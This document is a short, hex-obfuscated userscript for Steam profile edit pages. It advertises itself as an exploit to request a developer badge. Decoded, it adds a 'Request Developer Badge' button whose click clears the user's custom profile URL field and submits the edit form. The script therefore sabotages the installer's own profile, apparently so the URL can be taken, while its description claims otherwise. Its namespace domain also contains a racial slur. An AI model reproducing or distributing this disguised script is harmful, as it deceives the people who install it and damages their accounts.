// ==UserScript==
// @name Steam developer request exploit
// @namespace https://realnigga.club/
// @version 2.0
// @description Attempts to request Steam developer suite provided by Steam Cafe package
// @match https://steamcommunity.com/id/*/edit
// @match https://steamcommunity.com/profiles/*/edit
// @require     http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
// ==/UserScript==</pre>
var _0xa8c8=["\x64\x69\x76\x2E\x72\x69\x67\x68\x74\x62\x6F\x78\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x5F\x68\x65\x61\x64\x65\x72","\x3C\x62\x72\x3E\x3C\x62\x72\x3E\x3C\x61\x3E\x3C\x62\x75\x74\x74\x6F\x6E\x20\x74\x79\x70\x65\x3D\x22\x62\x75\x74\x74\x6F\x6E\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x62\x74\x6E\x5F\x67\x72\x65\x79\x5F\x67\x72\x65\x79\x20\x62\x74\x6E\x5F\x73\x6D\x61\x6C\x6C\x5F\x74\x68\x69\x6E\x22\x20\x69\x64\x3D\x22\x61\x74\x74\x65\x6D\x70\x74\x2D\x64\x65\x76\x65\x6C\x6F\x70\x65\x72\x2D\x6D\x6F\x64\x65\x22\x3E\x3C\x73\x70\x61\x6E\x3E\x52\x65\x71\x75\x65\x73\x74\x20\x44\x65\x76\x65\x6C\x6F\x70\x65\x72\x20\x42\x61\x64\x67\x65\x3C\x2F\x73\x70\x61\x6E\x3E\x3C\x2F\x62\x75\x74\x74\x6F\x6E\x3E\x3C\x2F\x61\x3E","\x61\x70\x70\x65\x6E\x64","\x63\x6C\x69\x63\x6B","\x23\x61\x74\x74\x65\x6D\x70\x74\x2D\x64\x65\x76\x65\x6C\x6F\x70\x65\x72\x2D\x6D\x6F\x64\x65","","\x76\x61\x6C","\x23\x63\x75\x73\x74\x6F\x6D\x55\x52\x4C","\x73\x75\x62\x6D\x69\x74","\x65\x64\x69\x74\x46\x6F\x72\x6D","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64"];
var developer_console=$(_0xa8c8[0]);
function attempt_developer_connection()
{
    if(developer_console)
    {
        developer_console[_0xa8c8[2]](_0xa8c8[1]);$(_0xa8c8[4])[_0xa8c8[3]](function()
        {
            ErequestData()
        }
        )
    }
}
attempt_developer_connection();
function ErequestData()
{
    $(_0xa8c8[7])[_0xa8c8[6]](_0xa8c8[5]);document[_0xa8c8[10]](_0xa8c8[9])[_0xa8c8[8]]()
}